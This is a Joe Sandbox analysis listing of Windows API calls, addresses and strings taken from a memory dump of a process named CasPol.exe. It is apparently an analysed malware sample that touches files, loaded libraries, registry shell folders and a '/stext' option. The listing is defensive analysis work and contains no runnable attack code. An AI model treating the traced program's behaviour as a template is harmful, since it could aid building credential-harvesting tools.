                                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                  • String ID: }A
                                                                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: BINARY
                                                                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1023896661-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3859505661-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
